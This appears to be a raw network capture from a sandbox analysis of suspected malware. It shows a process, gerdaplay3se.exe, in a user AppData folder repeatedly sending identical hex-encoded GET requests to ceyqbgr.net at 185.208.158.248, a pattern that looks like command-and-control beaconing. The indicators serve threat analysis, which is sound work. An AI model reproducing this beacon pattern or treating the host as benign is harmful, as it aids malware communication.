                                                                                Sep 27, 2024 17:32:31.500194073 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:32.209187984 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:32 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:32.319962025 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:32.559019089 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:32 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                33192.168.2.657557185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:32.690319061 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:33.392370939 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:33 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                34192.168.2.657558185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:33.516614914 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:34.215002060 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:34 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                35192.168.2.657559185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:34.341538906 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:35.049894094 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:34 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:35.163914919 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:35.411149025 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:35 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:35.523046017 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:35.763844013 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:35 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                36192.168.2.657560185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:35.887816906 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:36.593708038 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:36 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                37192.168.2.657561185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:36.715512991 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:37.422297955 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:37 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                38192.168.2.657562185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:37.544811964 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:38.261061907 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:38 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                39192.168.2.657563185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:38.579432011 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:39.289077997 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:39 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                40192.168.2.657564185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:39.417458057 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:40.123241901 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:40 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                41192.168.2.657565185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:40.246184111 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:40.924777031 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:40 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                42192.168.2.657566185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:41.173532009 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:41.880575895 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:41 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:41.990983963 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:42.250861883 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:42 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                43192.168.2.657567185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:42.370582104 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:43.068851948 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:42 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:43.177799940 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:43.421175957 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:43 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                44192.168.2.657568185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:43.542486906 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:47.253375053 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:47 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:47.366082907 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:47.601715088 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:47 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:47.710699081 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:47.946191072 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:47 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                45192.168.2.657570185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:48.074552059 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:48.796789885 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:48 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                46192.168.2.657571185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:48.917807102 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:49.613887072 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:49 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:32:49.726095915 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:49.962387085 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:49 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                47192.168.2.657572185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:50.091181993 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:50.807029009 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:50 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                48192.168.2.657573185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:50.935319901 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:51.669373989 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:51 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                49192.168.2.657574185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
